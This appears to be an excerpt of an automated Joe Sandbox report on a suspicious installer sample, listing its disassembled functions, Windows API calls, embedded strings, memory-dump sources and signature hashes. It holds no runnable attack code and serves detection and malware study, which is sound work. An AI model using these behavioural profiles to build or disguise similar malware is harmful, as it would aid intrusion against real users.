                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E919D
                                                                                                                • Part of subcall function 333E90BA: _free.LIBCMT ref: 333E91AF
                                                                                                              • _free.LIBCMT ref: 333E7CFB
                                                                                                                • Part of subcall function 333E571E: HeapFree.KERNEL32(00000000,00000000,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?), ref: 333E5734
                                                                                                                • Part of subcall function 333E571E: GetLastError.KERNEL32(?,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?,?), ref: 333E5746
                                                                                                              • _free.LIBCMT ref: 333E7D1D
                                                                                                              • _free.LIBCMT ref: 333E7D32
                                                                                                              • _free.LIBCMT ref: 333E7D3D
                                                                                                              • _free.LIBCMT ref: 333E7D5F
                                                                                                              • _free.LIBCMT ref: 333E7D72
                                                                                                              • _free.LIBCMT ref: 333E7D80
                                                                                                              • _free.LIBCMT ref: 333E7D8B
                                                                                                              • _free.LIBCMT ref: 333E7DC3
                                                                                                              • _free.LIBCMT ref: 333E7DCA
                                                                                                              • _free.LIBCMT ref: 333E7DE7
                                                                                                              • _free.LIBCMT ref: 333E7DFF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                              • String ID:
                                                                                                              • API String ID: 161543041-0
                                                                                                              • Opcode ID: f6f4895feec0bb16d62f5430239cdc17e05434d61a71e6e4ea0accd212f4ebef
                                                                                                              • Instruction ID: 7145f5c9226cab7d7b5a785b6b02e3e41164f6ea405e6d32228f745a20af1e01
                                                                                                              • Opcode Fuzzy Hash: f6f4895feec0bb16d62f5430239cdc17e05434d61a71e6e4ea0accd212f4ebef
                                                                                                              • Instruction Fuzzy Hash: 78313877E40324EFEB219EB8DD80B67B7EAEF00290F54C469F848D7650DA35E8909B10
                                                                                                              Function 0040440C Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 268stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040445B
                                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 00404485
                                                                                                              • SHBrowseForFolderA.SHELL32(?,0041F0B8,?), ref: 00404536
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404541
                                                                                                              • lstrcmpiA.KERNEL32(00422680,0041FCE0), ref: 00404573
                                                                                                              • lstrcatA.KERNEL32(?,00422680), ref: 0040457F
                                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404591
                                                                                                                • Part of subcall function 004054D8: GetDlgItemTextA.USER32(?,?,00000400,004045C8), ref: 004054EB
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,*?|<>/":,00000000,00429000,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FA3
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,?,?,00000000), ref: 00405FB0
                                                                                                                • Part of subcall function 00405F4B: CharNextA.USER32(?,00429000,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FB5
                                                                                                                • Part of subcall function 00405F4B: CharPrevA.USER32(?,?,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FC5
                                                                                                              • GetDiskFreeSpaceA.KERNEL32(0041ECB0,?,?,0000040F,?,0041ECB0,0041ECB0,?,00000000,0041ECB0,?,?,000003FB,?), ref: 0040464C
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404667
                                                                                                              • SetDlgItemTextA.USER32(00000000,00000400,0041ECA0), ref: 004046ED
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                              • String ID: A
                                                                                                              • API String ID: 2246997448-3554254475
                                                                                                              • Opcode ID: 03555cd9ff27d87b3461e579a81a8a683152280691b435c6bb34a1f742241f1a
                                                                                                              • Instruction ID: 313b0aeaa0dd49dd5f389a011650d1956071e47b5f1a5152bec8bcd399de40b9
                                                                                                              • Opcode Fuzzy Hash: 03555cd9ff27d87b3461e579a81a8a683152280691b435c6bb34a1f742241f1a
                                                                                                              • Instruction Fuzzy Hash: 049193B1900209ABDB10AFA1CD45BAF77B8EF85305F10847BFA01B72C1D77C9A418B69
                                                                                                              Function 00402C7B Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402C8F
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402CAB
                                                                                                                • Part of subcall function 00405971: GetFileAttributesA.KERNEL32(00000003,00402CBE,0042AC00,80000000,00000003), ref: 00405975
                                                                                                                • Part of subcall function 00405971: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405997
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402CF4
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402E3B
                                                                                                              Strings
                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E84
                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED2
                                                                                                              • soft, xrefs: 00402D6B
                                                                                                              • Error launching installer, xrefs: 00402CCB
                                                                                                              • Null, xrefs: 00402D74
                                                                                                              • Inst, xrefs: 00402D62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                              • API String ID: 2803837635-3016655952
                                                                                                              • Opcode ID: fa81fe972bfe3a764a13f7ad6aa669890b63427a85530cdf1b6a935a473f56a1
                                                                                                              • Instruction ID: 9de56974c203d5571711bd7ea282ed8ac83b373a822f3244ccbcaf21db740533
                                                                                                              • Opcode Fuzzy Hash: fa81fe972bfe3a764a13f7ad6aa669890b63427a85530cdf1b6a935a473f56a1
                                                                                                              • Instruction Fuzzy Hash: 1061E471A40205ABDB20AF65DE49B9E76B8EB14315F20403BF905B72D1D7BC9D408B9C
                                                                                                              Function 00405D02 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetVersion.KERNEL32(?,0041F4C0,00000000,00405003,0041F4C0,00000000), ref: 00405DB3
                                                                                                              • GetSystemDirectoryA.KERNEL32(00422680,00000400), ref: 00405E2E
                                                                                                              • GetWindowsDirectoryA.KERNEL32(00422680,00000400), ref: 00405E41
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E7D
                                                                                                              • SHGetPathFromIDListA.SHELL32(00000000,00422680), ref: 00405E8B
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00405E96
                                                                                                              • lstrcatA.KERNEL32(00422680,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EB8
                                                                                                              • lstrlenA.KERNEL32(00422680,?,0041F4C0,00000000,00405003,0041F4C0,00000000), ref: 00405F0A
                                                                                                              Strings
                                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405DFD
                                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EB2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 900638850-730719616
                                                                                                              • Opcode ID: 4eb09dbf17218f190c0a8c026c82e86a8bda34622b00820e868bf8cd3cf9af1c
                                                                                                              • Instruction ID: 2b293d25366fc547a30ad863a8204623ae8d1739f01cc20b9afdcfd3690b1d74
                                                                                                              • Opcode Fuzzy Hash: 4eb09dbf17218f190c0a8c026c82e86a8bda34622b00820e868bf8cd3cf9af1c
                                                                                                              • Instruction Fuzzy Hash: 46611271A04A05AAEB215F24EC88BBF3B68EB15310F10813BE541B62D1D37D4A42DF9E
                                                                                                              Function 333E59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 333E59EA
                                                                                                                • Part of subcall function 333E571E: HeapFree.KERNEL32(00000000,00000000,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?), ref: 333E5734
                                                                                                                • Part of subcall function 333E571E: GetLastError.KERNEL32(?,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?,?), ref: 333E5746
                                                                                                              • _free.LIBCMT ref: 333E59F6
                                                                                                              • _free.LIBCMT ref: 333E5A01
                                                                                                              • _free.LIBCMT ref: 333E5A0C
                                                                                                              • _free.LIBCMT ref: 333E5A17
                                                                                                              • _free.LIBCMT ref: 333E5A22
                                                                                                              • _free.LIBCMT ref: 333E5A2D
                                                                                                              • _free.LIBCMT ref: 333E5A38
                                                                                                              • _free.LIBCMT ref: 333E5A43
                                                                                                              • _free.LIBCMT ref: 333E5A51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: c319b3c15e1ba54c6a495a7a1661eb5c0cfce6aa750af677381257330655a223
                                                                                                              • Instruction ID: f44fbd9c17bcae098813533fd7d4e96fc1c00f18c80447ec9b740abf21a2ed9f
                                                                                                              • Opcode Fuzzy Hash: c319b3c15e1ba54c6a495a7a1661eb5c0cfce6aa750af677381257330655a223
                                                                                                              • Instruction Fuzzy Hash: 2011867BD20258FFEB11DF54C981CDD3FA5EF04290B5581A5BA088F625DA31EA60AB80
                                                                                                              Function 333EAA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DecodePointer
                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                              • Opcode ID: d59ddeae74b7af85802262f1e2a88390438ddd3d719c1d9b4c0695114bc5ed0a
                                                                                                              • Instruction ID: e84eb3d5d4e2abaaad211df9259b66f225613287484248aaba6e768b904932b9
                                                                                                              • Opcode Fuzzy Hash: d59ddeae74b7af85802262f1e2a88390438ddd3d719c1d9b4c0695114bc5ed0a
                                                                                                              • Instruction Fuzzy Hash: 1E5151BA91472ACBDF00EFA8E9445ED7FB9FF49310F95C185E480A7654CB368A24C714
                                                                                                              Function 333E1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D1B
                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 333E1D37
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D4B
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D58
                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D72
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D7D
                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 333E1D8A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                              • String ID:
                                                                                                              • API String ID: 1454806937-0
                                                                                                              • Opcode ID: 47bbcd131a3dd0392808bd7d3efa6542072828fd84b9be1bd9c9bbc5c26a3270
                                                                                                              • Instruction ID: cbe70fd32f75e404194bdbb8301a8bea7d753ea423aebf2f4ec9db4bf69cc785
                                                                                                              • Opcode Fuzzy Hash: 47bbcd131a3dd0392808bd7d3efa6542072828fd84b9be1bd9c9bbc5c26a3270
                                                                                                              • Instruction Fuzzy Hash: D721FFB2D4122CAFE720AFA0CC8CEFBB6ECEB49355F0445A5F515E2141D6749E468B70
                                                                                                              Function 00404035 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 00404052
                                                                                                              • GetSysColor.USER32(00000000), ref: 0040406E
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040407A
                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404086
                                                                                                              • GetSysColor.USER32(?), ref: 00404099
                                                                                                              • SetBkColor.GDI32(?,?), ref: 004040A9
                                                                                                              • DeleteObject.GDI32(?), ref: 004040C3
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 004040CD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                              • Instruction ID: aac8be200c2a37c7c3a3d9d61c48e2962f0c237efd7738e790c95123d26b84df
                                                                                                              • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                              • Instruction Fuzzy Hash: 732184B19047049BC7319F68DD08B4BBBF8AF41714F048A29EA95F22E1D738E944CB55
                                                                                                              Function 333E9492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,333E9C07,?,00000000,?,00000000,00000000), ref: 333E94D4
                                                                                                              • __fassign.LIBCMT ref: 333E954F
                                                                                                              • __fassign.LIBCMT ref: 333E956A
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 333E9590
                                                                                                              • WriteFile.KERNEL32(?,?,00000000,333E9C07,00000000,?,?,?,?,?,?,?,?,?,333E9C07,?), ref: 333E95AF
                                                                                                              • WriteFile.KERNEL32(?,?,?,333E9C07,00000000,?,?,?,?,?,?,?,?,?,333E9C07,?), ref: 333E95E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 1324828854-0
                                                                                                              • Opcode ID: e289d8ebd6a75b7629b8f937eb95b3449302f1f610b6c0a0673000854fa93629
                                                                                                              • Instruction ID: 59c2fce5399807778fe19d995c0f22ab8ae77a460b0dad36bde6f773a0b48dfa
                                                                                                              • Opcode Fuzzy Hash: e289d8ebd6a75b7629b8f937eb95b3449302f1f610b6c0a0673000854fa93629
                                                                                                              • Instruction Fuzzy Hash: D851B4B6D00219AFDB10CFA8CC95AEEBBF8EF49310F14811AE595F7281D734A941CB61
                                                                                                              Function 333E3370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 333E339B
                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 333E33A3
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 333E3431
                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 333E345C
                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 333E34B1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                              • Opcode ID: 1a06751187d594410c4f717dd48c66b369fe2cc47e1181fa6bbd13aa1e93d0eb
                                                                                                              • Instruction ID: 2f07004898b4d4dc21acd9baf3c5244db318625ac3376ac3eb8d5252c17a90a0
                                                                                                              • Opcode Fuzzy Hash: 1a06751187d594410c4f717dd48c66b369fe2cc47e1181fa6bbd13aa1e93d0eb
                                                                                                              • Instruction Fuzzy Hash: 5141E37AE003289BCB01DF68C880A9EBBF5AF45334F48D195E815AB351D731EA41CF92
                                                                                                              Function 00402685 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004026D9
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004026F5
                                                                                                              • GlobalFree.KERNEL32(?), ref: 0040272E
                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402740
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402747
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040275F
                                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402773
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3294113728-0
                                                                                                              • Opcode ID: f6813a6ec52387077f45cd6a5d7e66dc1a82678df2c2094744b3b0aeb8f892d5
                                                                                                              • Instruction ID: 61f3ed29154f776cadf79894fffc4e7c3199e3b8836c730970b54a9edadab088
                                                                                                              • Opcode Fuzzy Hash: f6813a6ec52387077f45cd6a5d7e66dc1a82678df2c2094744b3b0aeb8f892d5
                                                                                                              • Instruction Fuzzy Hash: 23318D71C00128BBDF216FA5DD49D9E7A79EF09364F10422AF5207A2E1C7794C419BA9
                                                                                                              Function 00404FCB Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                              • lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                              • lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                              • SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: 24f52add238690ae2ba30c5bae490f19be7bb152a922a23f2cfa91187b438abe
                                                                                                              • Instruction ID: 5a4c84274bcf923500a8bde6a880dece6f7157f711da0bf1dba54453946cb231
                                                                                                              • Opcode Fuzzy Hash: 24f52add238690ae2ba30c5bae490f19be7bb152a922a23f2cfa91187b438abe
                                                                                                              • Instruction Fuzzy Hash: 40218C71900508BBDB119FA5CD84ADFBFA9EF04354F04807AF948A6290C3798E819FA8
                                                                                                              Function 333E925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 333E9221: _free.LIBCMT ref: 333E924A
                                                                                                              • _free.LIBCMT ref: 333E92AB
                                                                                                                • Part of subcall function 333E571E: HeapFree.KERNEL32(00000000,00000000,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?), ref: 333E5734
                                                                                                                • Part of subcall function 333E571E: GetLastError.KERNEL32(?,?,333E924F,?,00000000,?,00000000,?,333E9276,?,00000007,?,?,333E7E5A,?,?), ref: 333E5746
                                                                                                              • _free.LIBCMT ref: 333E92B6
                                                                                                              • _free.LIBCMT ref: 333E92C1
                                                                                                              • _free.LIBCMT ref: 333E9315
                                                                                                              • _free.LIBCMT ref: 333E9320
                                                                                                              • _free.LIBCMT ref: 333E932B
                                                                                                              • _free.LIBCMT ref: 333E9336
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
